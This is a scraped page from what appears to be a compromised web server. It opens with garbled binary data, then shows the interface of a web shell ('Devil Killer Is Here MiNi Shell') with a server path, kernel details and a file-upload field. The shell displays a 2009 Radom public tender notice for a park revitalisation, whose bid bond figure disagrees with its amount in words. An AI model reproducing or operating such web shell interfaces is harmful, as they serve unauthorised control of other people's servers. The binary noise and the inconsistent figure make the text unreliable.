JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090701/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090701/103107-N-2009.html

<p class="kh_header"><b>Radom: Rewitalizacja Parku im. T. Kościuszki</b><br>
<b>Numer ogłoszenia: 103107 - 2009; data zamieszczenia: 01.07.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina  Miasta Radomia , ul. Jana Kilińskiego 30, 26-600 Radom, woj. mazowieckie, tel. 048 3620471, faks 048 3620532.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.radom.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Rewitalizacja Parku im. T. Kościuszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest kompleksowa rewitalizacja oraz późniejsza pielęgnacja zieleni zabytkowego parku miejskiego im. T. Kościuszki w Radomiu , o pow. całkowitej ok. 76 945 m2.
Teren objęty zamówieniem jest w całości przeznaczony pod ogólnie dostępną zieleń parkową z funkcją rekreacyjną dla okolicznych mieszkańców . Dotychczasowy sposób jego wykorzystania pozostaje bez zmian. 
Pow.  placów zabaw ok. 1610 m2
Pow. zabudowy wszystkich obiektów budowlanych na terenie parku  - ok.1674m2  w tym pow. szaletu - ok.75 m2 
Pow. trawników i pozostałych terenów obsadzonych - ok.57 646 m2
Nawierzchnie w obrębie parku :
- nawierzchnie żwirowe typu np. HANSE GRAND ok. 11 363 m2
- nawierzchnia bitumiczna - barwiona  ( ścieżka dla rowerzystów ) - ok.2206m2
- nawierzchnia syntetyczna placów zabaw ( naw. Poliuretanowa ) - ok.297m2 
- nawierzchnia alei im. Ks. Bp. J. Chrapka z kostki i płyt granitowych - ok.1484m2 
- nawierzchnia z piasku wokół placów zabaw ok. 910 m2 
- nawierzchnia z kostki kamiennej 9/11 - ok.512 m2 
Powierzchnie zieleni w obrębie parku :
- pow. rabat ściółkowanych matą i korą oraz i rabat kwiatowych  - ok.4 639 m2
- pow. nasadzeń krzewów ściółkowanych korą -ok. 16 971 m2 
- pow. trawników na stanowiskach zacienionych i trawników rekreacyjnych -ok. 31 336 m2

2. Zakres robót składających się na przedmiot zamówienia obejmuje: 

2.1.1  Wykonanie zadania nr I:  Rewitalizacja Parku im. T. Kościuszki- roboty rewitalizacyjne w tym m.in.:
a) przebudowa nawierzchni istniejących ciągów pieszych i pieszo -jezdnych, budowę nowych ciągów pieszych i ścieżek  -    pow. ok. 16015m2
b) wymiana oświetlenia terenu parku ( ok. 86 szt opraw oświetlenia zewnętrznego ścieżek parkowych na słupach typu LS4  )  , podświetlenie drzew ( 25 okazów zabytkowych drzew ) i, obiektów , ze szczególnym uwzględnieniem ozdobnego oświetlenia alei bpa. Chrapka  (12 kpl. projektorów oświetleniowych typ HIT 70W, 262kpl projektorów oświetleniowych typ LED , 31kpl opraw halogenowych  50W ) .Okablowanie dł. -ok.  4 237 m. 
c)  likwidacja istniejących kontenerowych toalet ( 5 kabin do usunięcia po 30.04.2010r ) wraz z rozbiórką istniejącego muru osłonowego 
d)  budowa nowych szaletów miejskich ( kubatura ok.164m3 ) wraz z instalacjami
e) przyłącze i sieć wodociągowa dla potrzeb szaletu , z rur PE 100 SDR11 śr90 i 32 ,  dł. łączna - ok. 90 m , 1kpl -hydrant pożarowy DN-80
f) przyłącze kanalizacji sanitarnej  do szaletu -  z rur PVC 160 SN4 - dł. ok.84m 
g) instalacja nawadniająca tereny zieleni parku: 
- system rur PE100SDR11 śr. 63 dł. ok.1226m punkty czerpalne w formie studzienek rewizyjnych wraz z kompletem zaworów - 13 szt. 
- system nawadniania automatycznego: rury PE śr.32mm, dł. ok. 2300m  zraszacze -78 szt. , i linie kroplujące długość ok. 400 m
h)  przeniesienie na nowe miejsce lokalizacji pomników : Chopina i tablicy pamiątkowej poświęconej T. Kościuszce 
i) likwidacja istniejącej fontanny -  basenu p.poż. 
j) remont  murków wydzielających wzdłuż ul. Sienkiewicza i 25 Czerwca na dł. ok.357 m., polegający na wykonaniu nowych fundamentów i ścian z bloków betonowych oraz oczyszczeniu, uzupełnieniu i impregnacji czap z piaskowca  
k) odtworzenie fragmentu muru dawnego ogrodzenia parkowego w formie elementów murowanych i metalowych  -   dł . ok. 12 m 
l) przebudowa murku rabaty z roślinnością parkową  - mur o konstrukcji tradycyjnej murowanej z wykończeniem z piaskowca - wym.: wys. .ok. 65cm , dł. ok. 49m 
m)  wymiana elementów wyposażenia parku : stylizowane ławki ( 76 szt.)  , kosze na śmiecie ( 73 szt.)  , tablice informacyjne ( 8 szt ) , wolnostojący karmnik typu heski , montaż 10 szt. budek lęgowych dla ptaków  i betonowe poidło dla ptaków 
n) przebudowa  placów zabaw dla dzieci młodszych i starszych wraz z wyposażeniem w urządzenia zabawowe , ogrodzenie  i nowa nawierzchnia ,  pow. 1610 m2 
o) urządzenie placu sportowo-rekreacyjnego na pow. 360m2 w miejscu po istniejącym basenie p.poż. i wyposażenie go w urządzenia do ćwiczeń , montaż stołu do ping-ponga 
p) w zakresie gospodarki zielenią:
- odbudowa trawników dywanowych na pow. ok.4460 m2 
-  uzupełnienie i odtworzenie zadrzewień alejowych  , nasadzenia drzew - 326 szt 
- zabiegi pielęgnacyjne i lecznicze istniejących drzew i krzewów , przycinanie drzew 
- wykonanie nowych nasadzeń skupin krzewów niskich i średnich ozdobnych ,osłonowych krzewów średnich i wyższych od strony ulic - 8567 szt krzewów liściastych , 838 szt krzewów iglastych 
- wykonanie ozdobnej zieleni niskiej w postaci rabat i nasadzeń jednorocznych i wieloletnich bylinowych i cebulowych - ok.180 szt roślin cebulowych , ok. 140 szt róż , 3szt pnączy 
- odtworzenie runa parkowego w postaci zieleni okrywowej 

2.1.2  Wykonanie zadania nr II:  Rewitalizacja Parku im. T. Kościuszki- pielęgnacja zieleni:
w okresie od odbioru końcowego zadania nr I do dnia 30.11.2011 roku

Zakres prac pielęgnacyjnych obejmuje:
a)	usuwanie zniszczonych drzew i krzewów (w wyniku wichur, śnieżyc bądź innych zdarzeń
losowych) lub drzew zagrażających bezpieczeństwu ludzi i mienia w ciągu dwóch godzin
od stwierdzenia zagrożenia, po uprzednim zgłoszeniu tego faktu do Wojewódzkiego Urzędu Ochrony Zabytków w Warszawie Delegatura w Radomiu (tel. 0-48-363-85-14 oraz Wydziału Infrastruktury (0-48-362-07-50),
b)	udział w przeglądach drzewostanu, oględzinach
c)	usuwanie suchych drzew w ciągu tygodnia od uprawomocnienia się decyzji na wycinkę,
d)	cięcia sanitarne, pielęgnacyjne, techniczne drzew i krzewów (odsłanianie elementów
infrastruktury; znaków, latarń, tablic itp.) - w zależności od potrzeb,
e)	cięcia formujące drzew, krzewów, żywopłotów
f)	koszenie trawników gwarantujące utrzymanie traw na wysokości nie większej ok. 5 cm,
g)	aerowanie i wertykulowanie na 6 cm trawników (1 raz w roku)
h)	dosiewanie trawników mieszankami założycielskimi
i)	grabienie skoszonej trawy i wywóz w ciągu 2 dni od wykonania pokosu,
j)	grabienie liści kasztanowców, ich kompostowanie na gorąco bądź wywóz, na miejską
kompostownię - na bieżąco,
k)	grabienie i wywóz pozostałych liści - do 30 listopada,
l)	konserwacja żywopłotów i odchwaszczanie grup krzewów, rabat kwiatowych, nawożenie 
m)	kształtowanie mis oraz ściółkowanie roślin warstwą kory, kompostu, agrowłókniny
n)	podlewanie roślin - w zależności od potrzeb,
o)	uzupełnianie palików i poprawianie wiązań, kontrola stabilności palików
p)	uzupełnianie roślin w gatunkach i ilościach zgodnych z projektem w terminie wiosennym lub jesiennym, w tym wymiana zamarłych i uszkodzonych roślin
q)	zabezpieczanie roślin na zimę (możliwość zastosowania biowłókniny, stroiszu, mat słomianych),
r)	sprawdzanie pod kątem żerowania szkodników i występowania chorób grzybowych
s)	nawożenie nawozami wieloskładnikowymi (dwukrotnie) zgodnie z zapotrzebowaniem danego gatunku i odmiany
t)	wykonanie i pielęgnacja rabat kwiatowych zgodnie z projektem
u)	utrzymanie rabat kwiatowych w kształcie i parametrach zgodnych z projektem
v)	prace należy wykonywać w sposób nie powodujący zniszczenia istniejącego runa parkowego (koszenie nie wcześniej niż po zakończeniu kwitnięcia)..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.11-2, 45.11.27.23-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się wadium w wysokości:  165.000,00 (słownie: trzynaście tysięcy i 00/100) złotych<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1.	O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy:

1)	Złożą ofertę zgodnie z warunkami Specyfikacji Istotnych Warunków Zamówienia oraz ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zmianami),
2)	Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień,
3)	Posiadają niezbędna wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia, lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, w szczególności:
a) wykonali należycie w okresie ostatnich 5 lat przed dniem wszczęcia postępowania 
o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 1 zamówienie w zakresie robót budowlanych obejmujące kompleksową rewitalizację parku o powierzchni min. 3 ha,
b) zapewnią kierowanie prowadzonymi robotami przez: kierownika budowy, posiadającego uprawnienia budowlane do kierowania robotami w specjalności drogowej, oraz kierowników robót posiadających uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej, instalacyjnej w zakresie instalacji i sieci elektrycznych, wodnych i kanalizacyjnych, wpisanych na listę członków właściwej izby samorządu zawodowego /Art. 6 ustawy z dnia 15 grudnia 2000 roku o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów - Dz. U. z 2001 r. Nr 5, poz. 42 z późniejszymi zmianami/, oraz dysponują osobą do kierowania pracami konserwatorskimi lub pracami restauratorskimi polegającymi na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej spełniająca warunki wynikające z Rozporządzenie Ministra Kultury z dn. 09.06.2004  - Dz.U. Nr 150 poz. 1579 (wymagane uprawnienia spełniające warunek określony w §8.ust3  w/w rozporządzenia)
4)	Znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, w szczególności:
a) posiadają zdolność kredytową na kwotę nie mniejszą niż 200.000,00 zł lub posiadają środki finansowe na rachunku w kwocie nie mniejszej niż w/w,
5)	Nie podlegają wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zmianami).
2.	Zamawiający oceni spełnienie warunków udziału w postępowaniu na podstawie dokumentów załączonych do oferty. Ocena spełniania warunków wymaganych od wykonawców prowadzona będzie na podstawie analizy w/w dokumentów metodą zero - jedynkową. Oznacza to, że wystarczającym powodem do wykluczenia wykonawcy może być brak w ofercie któregokolwiek z wymaganych dokumentów lub ich nie uzupełnienie, we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zmianami).
3.	Ofertę wykonawcy wykluczonego uznaje się za odrzuconą..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Na podstawie art. 44 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zmianami) oraz § 1 i 2 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane (Dz.U. z 2006 r. Nr 87 poz. 605 z późn. zmianami), zwanego dalej rozporządzeniem, w celu potwierdzenia, że wykonawca posiada uprawnienia do wykonywania określonej działalności lub czynności oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zmianami) oraz, że wykonawca posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub jest w stanie przedstawić pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia oraz, że wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia, Zamawiający wymaga załączenia do oferty następujących dokumentów:


1.	Załącznik nr 1 - Oświadczenie o spełnianiu warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 1-3 oraz o nie podleganiu wykluczeniu z postępowania na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zmianami) - o treści zgodnej ze wzorem załączonym do materiałów przetargowych. 

2. Załącznik nr 2 - aktualny odpis z właściwego rejestru albo aktualne zaświadczenie 
o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu 
do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.

UWAGA: 
1) Za aktualne uznane zostanie także zaświadczenie wydane wcześniej, którego aktualność potwierdza organ wydający w wymaganym terminie. 
Potwierdzenie za zgodność z oryginałem nie stanowi potwierdzenia aktualności zaświadczenia.
2) Wyciąg z rejestru nie stanowi zaświadczenia o wpisie do ewidencji działalności gospodarczej. 
Przedłożenie wyciągu w miejsce wymaganego zaświadczenia Zamawiający nie uzna za potwierdzenie spełnienia warunku.

3. Załącznik nr 3 - aktualne zaświadczenie właściwego naczelnika urzędu skarbowego /wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert/ potwierdzające, że wykonawca nie zalega z opłacaniem podatków, opłat lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

4. Załącznik nr 4 - aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego /wystawione nie wcześniej
niż 3 miesiące przed upływem terminu składania ofert/ potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne lub zaświadczenie, że uzyskał zgodę na przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu.

5. Załącznik nr 5 - aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.) - wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. 

6. Załącznik nr 6 (należy złożyć w przypadku podmiotów zbiorowych) - aktualna informacja z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust.1 pkt. 9 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zm.), wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W rozumieniu ustawy z dnia 28 października 2002 r. o odpowiedzialności podmiotów zbiorowych za czyny zabronione pod groźbą kary (Dz.U. z 2002 r. Nr 197, poz.1661 z późniejszymi zmianami), podmiotem zbiorowym jest:
a)	osoba prawna,
b)	jednostka organizacyjna niemająca osobowości prawnej, której odrębne przepisy przyznają zdolność prawną, z wyłączeniem Skarbu Państwa, jednostek samorządu terytorialnego i ich związków,
c)	spółka handlowa z udziałem Skarbu Państwa, jednostki samorządu terytorialnego lub związku takich jednostek, 
d)	spółka kapitałowa w organizacji, 
e)	podmiot w stanie likwidacji,
f)	przedsiębiorca nie będący osobą fizyczną (np. spółka jawna), 
g)	zagraniczna jednostka organizacyjna. 

7. Załącznik nr 7 - Informacja banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w którym wykonawca posiada rachunek, potwierdzająca, że wykonawca posiada na rachunku kwotę środków finansowych nie mniejszą niż 200.000,00 złotych lub potwierdzająca, że wykonawca posiada zdolność kredytową na kwotę min. 200.000,00 złotych, lub potwierdzająca, że łącznie z obydwu w/w źródeł wykonawca wykaże (posiada na rachunku i posiada zdolność kredytową) kwotę nie mniejszą niż 200.000,00 złotych, wystawiona nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. 
Z treści w/w informacji musi bezwzględnie wynikać spełnienie warunku osiągnięcia w/w kwoty.

8. Załącznik nr 8 - dokument uprawnień budowlanych kierownika budowy, posiadającego uprawnienia budowlane do kierowania robotami w specjalności drogowej, oraz kierowników robót posiadających uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej, instalacyjnej w zakresie instalacji i sieci elektrycznych, wodnych i kanalizacyjnych, wpisanych na listę członków właściwej izby samorządu zawodowego, oraz dokument uprawnień kierownika prac konserwatorskich do kierowania pracami konserwatorskimi lub pracami restauratorskimi polegającymi na zabezpieczeniu, uzupełnieniu, rekonstrukcji lub konserwacji parków zabytkowych albo innego rodzaju zorganizowanej zieleni zabytkowej, spełniający warunek określony w § 8. ust3 Rozporządzenie Ministra Kultury z dn. 09.06.2004  - Dz.U. Nr 150 poz. 1579.

9. Załącznik nr 9 - wykaz  należycie wykonanych w okresie ostatnich 5 lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, zamówień (minimum 1) w zakresie robót budowlanych obejmujących kompleksową rewitalizację parku o powierzchni min. 3 ha.

10. Załącznik nr 10 - dokumenty (dla minimum 1 zamówienia na roboty budowlane) potwierdzające, że roboty wymienione w załączniku nr 9 zostały wykonane z należytą starannością. 

UWAGA:
Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczpospolitej Polskiej składa:
1) zamiast dokumentu, o którym mowa w formie załącznika nr 2, 3, 4, 6 dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b)	nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie zdrowotne i społeczne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c)	nie orzeczono wobec niego zakazu ubiegania się o zamówienie;
2) zamiast dokumentu, o którym mowa w formie załącznika nr 5 zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (tekst jednolity: Dz.U. z 2007 r. Nr 223, poz. 1655 z późn. zmianami).
Dokumenty, o których mowa w pkt 1) lit. a i c oraz w pkt 2), powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert. Dokument, o którym mowa w pkt 1) lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Jeżeli w kraju pochodzenia osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania nie wydaje się dokumentu, o którym mowa powyżej zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce wykonania.

Dokumenty składane w trakcie postępowania zawierające informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (tekst jednolity: Dz.U. z 2003 r. Nr 153, poz. 1503 z późniejszymi zmianami), co do których wykonawca zastrzegł, że nie mogą być udostępnione podmiotom innym niż Zamawiający muszą być oznaczone klauzulą TAJNE w prawym górnym rogu każdej strony dokumentu je zawierającego. Brak takiego zastrzeżenia traktowany będzie jako zgoda wykonawcy na ujawnienie zainteresowanym przedmiotowych informacji. 
Za tajemnicę przedsiębiorstwa nie mogą być uznane w szczególności:
- aktualny odpis z właściwego rejestru,
- informacje ujawniane przez Zamawiającego w trakcie otwarcia ofert.
Przez tajemnicę przedsiębiorstwa w rozumieniu art. 11 ust. 4 ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji (tekst jednolity: Dz.U. z 2003 r. Nr 153, poz. 1503 z późniejszymi zmianami) rozumie się nieujawnione do publicznej wiadomości informacje techniczne, technologiczne, organizacyjne przedsiębiorstwa lub inne posiadające wartość gospodarczą, co do których przedsiębiorca podjął niezbędne działania w celu zachowania ich poufności.


III.2.b) Informacja dla  wykonawców wspólnie ubiegający się o udzielenie zamówienia

 1. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są załączyć do oferty:
1)	Załącznik nr 12 (składają wykonawcy wspólnie ubiegający się o udzielenie zamówienia np. konsorcjum, spółka cywilna) - pełnomocnictwo, o treści zgodnej ze wzorem załączonym do SIWZ.
2. Brak w ofercie ww. załącznika lub jego nie uzupełnienie, we wskazanym przez Zamawiającego terminie, w trybie art. 26 ust. 3 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych stanowić będzie podstawę odrzucenia oferty.</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji jakości - 5</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
